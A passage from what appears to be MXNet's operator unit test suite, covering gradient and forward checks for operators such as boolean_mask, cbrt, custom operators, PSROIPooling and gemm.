out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
# helper function to identify inputs likely to fail check_numeric_gradient tol test
# due to finite difference method inaccuracies or function discontuities at the origin
def bad_input_finder(f, f_grad, dtype):
eps = default_numeric_eps()[np.dtype(dtype)]
rtol = default_rtols()[np.dtype(dtype)]
def expected_relative_error(x):
fd_gradient = (f(x+eps/2) - f(x-eps/2)) / eps
return abs(fd_gradient/f_grad(x) - 1)
def is_fd_problem_input(x):
return abs(x) < eps/2 or expected_relative_error(x) > rtol
return np.vectorize(is_fd_problem_input)
def test_reciprocal_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.reciprocal,
lambda x: -np.reciprocal(x)**2, np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
def test_cbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.cbrt,
lambda x: 1./(3 * np.cbrt(x)**2), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
def test_rcbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(lambda x: 1./np.cbrt(x),
lambda x: -1./(3 * np.cbrt(x)**4), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data").as_np_ndarray()
offset_data_var = mx.symbol.Variable(name="offset_data").as_np_ndarray()
weight_var = mx.symbol.Variable(name="weight").as_np_ndarray()
bias_var = mx.symbol.Variable(name="bias").as_np_ndarray()
op = mx.sym.npx.deformable_convolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0), numeric_eps=1.0/64)
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = None, atol_fw = None,
rtol_bw = None, atol_bw = None, num_eps = None):
def np_random_data(shape, dtype=np.float32):
return np.random.uniform(low=-0.5,
high=0.5, size=shape).astype(dtype)
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np_random_data(shape1, dtype)
data_in2 = np_random_data(shape2, dtype)
data_in3 = np_random_data(shape3, dtype)
data_in4 = np_random_data(shape4, dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
def test_gemm():
_gemm_test_helper(np.float64, True)
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '0'):
_gemm_test_helper(np.float32, True)
if default_context().device_type == 'gpu':
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '1'):
_gemm_test_helper(np.float32, True)
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
